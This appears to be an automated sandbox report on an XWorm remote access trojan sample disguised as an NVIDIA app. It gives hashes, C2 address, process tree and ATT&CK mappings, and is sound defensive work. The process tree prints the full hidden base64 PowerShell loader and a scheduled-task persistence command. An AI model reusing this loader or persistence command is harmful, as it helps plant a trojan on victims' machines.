xworm | f5e258657d2fff2421af1045023ed6ffa0b2c5bdbee9cb186f143ee47320b0a3

General

Target

example.lnk
Size

106KB
MD5

6975af881b0b0e3751002dcc064b886a
SHA1

fa4fe5dfc3897677ee5b5c69cd189e4167427d37
SHA256

f5e258657d2fff2421af1045023ed6ffa0b2c5bdbee9cb186f143ee47320b0a3
SHA512

6ffa48d6d88ea3466a23e793aaca6288e4175c3cae4daa695213aaaa747077795ec5ea5aad0fb666aa59dff14922c8ef70f39245bafed5f891bf815e6eafb587
SSDEEP

3072:pMFdgBocsBz76H4ELGylzlAX8tKWdJTU+S4St:pMFdgBoRN7yHOorJTU+S4St

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

181.214.214.6:30120

Mutex

z5dRlxK0ktwBzYfm

Attributes

Install_directory
%ProgramData%
install_file
NVIDIA app.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000c000000023be1-22.dat	family_xworm
behavioral2/memory/5044-29-0x0000000000B60000-0x0000000000B70000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
436	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	2v1.exe

Executes dropped EXE 2 IoCs

pid	Process
5044	2v1.exe
2508	NVIDIA app.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1004	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings	powershell.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4584	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3836	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
436	powershell.exe
436	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	436	powershell.exe
Token: SeDebugPrivilege	5044	2v1.exe
Token: SeDebugPrivilege	5044	2v1.exe
Token: SeDebugPrivilege	2508	NVIDIA app.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2640 wrote to memory of 436	2640	cmd.exe	90
PID 2640 wrote to memory of 436	2640	cmd.exe	90
PID 436 wrote to memory of 4584	436	powershell.exe	91
PID 436 wrote to memory of 4584	436	powershell.exe	91
PID 436 wrote to memory of 5044	436	powershell.exe	92
PID 436 wrote to memory of 5044	436	powershell.exe	92
PID 5044 wrote to memory of 3836	5044	2v1.exe	97
PID 5044 wrote to memory of 3836	5044	2v1.exe	97
PID 5044 wrote to memory of 2948	5044	2v1.exe	105
PID 5044 wrote to memory of 2948	5044	2v1.exe	105
PID 5044 wrote to memory of 3576	5044	2v1.exe	107
PID 5044 wrote to memory of 3576	5044	2v1.exe	107
PID 3576 wrote to memory of 1004	3576	cmd.exe	109
PID 3576 wrote to memory of 1004	3576	cmd.exe	109

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\example.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -noe -WindowStyle hidden -e JABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUAIAA9ACAAMAB4ADAAMAAwADEAOQBlAGYANgAKACQAcwBjAHIAaQBwAHQAXwBsAGUAbgBnAHQAaAAgAD0AIAAyADcAOAA4ADsACgAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAKgAuAGwAbgBrACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAANQAxADIAMAAwAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAATgBhAG0AZQA7AAoACgBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACkAKQAKAHsACgAkAHYAYQBsACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAuAC8AIAAtAEYAaQBsAHQAZQByACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAFIAZQBjAHUAcgBzAGUAOwAKAGkAZgAgACgALQBuAG8AdAAgACQAdgBhAGwAKQAKAHsACgBlAHgAaQB0AAoAfQAKAFsASQBPAC4ARABpAHIAZQBjAHQAbwByAHkAXQA6ADoAUwBlAHQAQwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAoACQAdgBhAGwALgBEAGkAcgBlAGMAdABvAHIAeQBOAGEAbQBlACkAOwAKAH0ACgAkAGYAaQBsAGUAcwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAGYAaQBsAGUAbgBhAG0AZQAsACcATwBwAGUAbgAnACwAJwBSAGUAYQBkACcALAAnAFIAZQBhAGQAVwByAGkAdABlACcAOwAKACQAdgBhAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACgAJABzAGMAcgBpAHAAdABfAGwAZQBuAGcAdABoACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBTAGUAZQBrACgAJABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJAB2AGEAbAAsADAALAAkAHMAYwByAGkAcAB0AF8AbABlAG4AZwB0AGgAKQA7AAoAJAB2AGEAbAAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABDAGgAYQByAEEAcgByAGEAeQAoACQAdgBhAGwALAAwACwAJAB2AGEAbAAuAEwAZQBuAGcAdABoACkAOwAKACQAcwB0AHIAaQBuAGcAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB2AGEAbAApADsACgBpAGUAeAAgACQAcwB0AHIAaQBuAGcAOwA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:436
- - C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\tesasd.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:4584
- - C:\Users\Admin\AppData\Local\2v1.exe
    "C:\Users\Admin\AppData\Local\2v1.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "NVIDIA app" /tr "C:\ProgramData\NVIDIA app.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3836
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /delete /f /tn "NVIDIA app"
      4⤵
      PID:2948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8150.tmp.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3576
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1004

C:\ProgramData\NVIDIA app.exe
"C:\ProgramData\NVIDIA app.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\2v1.exe

Filesize
39KB

MD5
4806c4d94f23b4aa628a7429255dde3e

SHA1
7588e35d34ed8184e34364faf72a3171b9a853ee

SHA256
38027f90b5fa2ddf926f00a1fc93e12e47dc76c0c55d4b75e28205eee31dc573

SHA512
45c16a1fc3985bab29910dc08cad2e10773ab8b59a776220c84698027c84be9a006a6ec311b3a3bcbb3e4c872664f317242783a602e06ef6032cdf9a14accdbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ru3oyhga.i5j.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesasd.txt

Filesize
52KB

MD5
11007bb286caf468648bfdb698077dbe

SHA1
c75bacef9096d5e8d3613e062ca10acb492a2d88

SHA256
04864cb1cc9647bd297b3bf8818595fc65d870a8fa74ee3a420fedfcafdfa292

SHA512
8ef29a7c561a224fca5ff289103b7c8e84c12f92e954bc3751907c430562f42c018aa8f5d7599852dea17bccf93e5fbb2e47cc75ba9ce377b58981f011e2ac17

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8150.tmp.bat

Filesize
150B

MD5
8e26d8b52d4913d264c1c13510260578

SHA1
d9354dd8e55f9286f554b6e6829bdbfdf5780b4c

SHA256
7e4819526ab224bc2d5bb20a65554f2a79bd635fe9e9f20ff0b8c7d4f3d97e5c

SHA512
1720c5a205bd8c5868b9c1c51e849cf060be63e77075a09e5a0716bc701f6aa1bc595a51faea3bf83acb3e972173a8b08193c9e12055f5d69b4d47df99965934

Download Submit
memory/436-2-0x00007FF929323000-0x00007FF929325000-memory.dmp

Filesize
8KB

Download
memory/436-3-0x000001C3F8DA0000-0x000001C3F8DC2000-memory.dmp

Filesize
136KB

Download
memory/436-13-0x00007FF929320000-0x00007FF929DE1000-memory.dmp

Filesize
10.8MB

Download
memory/436-14-0x00007FF929320000-0x00007FF929DE1000-memory.dmp

Filesize
10.8MB

Download
memory/436-31-0x00007FF929323000-0x00007FF929325000-memory.dmp

Filesize
8KB

Download
memory/436-32-0x00007FF929320000-0x00007FF929DE1000-memory.dmp

Filesize
10.8MB

Download
memory/5044-29-0x0000000000B60000-0x0000000000B70000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads